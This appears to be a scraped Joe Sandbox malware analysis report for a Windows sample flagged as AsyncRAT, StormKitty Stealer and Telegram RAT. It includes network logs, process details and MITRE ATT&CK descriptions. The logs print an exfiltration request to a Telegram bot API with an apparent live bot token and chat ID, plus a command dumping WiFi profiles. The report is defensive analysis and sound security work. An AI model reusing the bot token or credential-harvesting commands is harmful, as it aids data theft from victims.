2025-01-11 00:12:50 UTC	344	IN	HTTP/1.1 403 Forbidden Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 00:12:50 GMT Content-Type: application/json Content-Length: 84 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 00:12:50 UTC	84	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 33 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 46 6f 72 62 69 64 64 65 6e 3a 20 62 6f 74 20 77 61 73 20 62 6c 6f 63 6b 65 64 20 62 79 20 74 68 65 20 75 73 65 72 22 7d Data Ascii: {"ok":false,"error_code":403,"description":"Forbidden: bot was blocked by the user"}

Timestamp	Bytes transferred	Direction	Data
2025-01-11 00:12:51 UTC	171	OUT	GET /bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1 Host: api.telegram.org
2025-01-11 00:12:51 UTC	344	IN	HTTP/1.1 403 Forbidden Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 00:12:51 GMT Content-Type: application/json Content-Length: 84 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 00:12:51 UTC	84	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 33 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 46 6f 72 62 69 64 64 65 6e 3a 20 62 6f 74 20 77 61 73 20 62 6c 6f 63 6b 65 64 20 62 79 20 74 68 65 20 75 73 65 72 22 7d Data Ascii: {"ok":false,"error_code":403,"description":"Forbidden: bot was blocked by the user"}

Target ID:	1
Start time:	19:12:29
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\JGvCEaqruI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\JGvCEaqruI.exe"
Imagebase:	0xfb0000
File size:	933'888 bytes
MD5 hash:	FEF7AAB8BBB6E60534EDC8DB7AAFF00A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000001.00000002.1281952275.00000000045BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000001.00000002.1281952275.00000000045BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1281952275.00000000045BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.1281952275.00000000045BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000001.00000002.1281952275.00000000045BB000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Target ID:	10
Start time:	19:12:44
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	13
Start time:	19:12:46
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0xf80000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Execution Coverage:	11.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.2%
Total number of Nodes:	247
Total number of Limit Nodes:	17

Execution Coverage:	16.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.4%
Total number of Nodes:	87
Total number of Limit Nodes:	0

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report JGvCEaqruI.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: AsyncRAT

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\9c1c4ba6bed6227a288d9e4ecbf7b952\msgid.dat

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\JGvCEaqruI.exe.log

C:\Users\user\AppData\Local\Temp\places.raw

C:\Users\user\AppData\Local\Temp\tmp39E3.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp3A12.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp3A23.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp3A43.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp3A54.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp3A93.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp3AA4.tmp.dat

Windows Analysis Report
JGvCEaqruI.exe

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre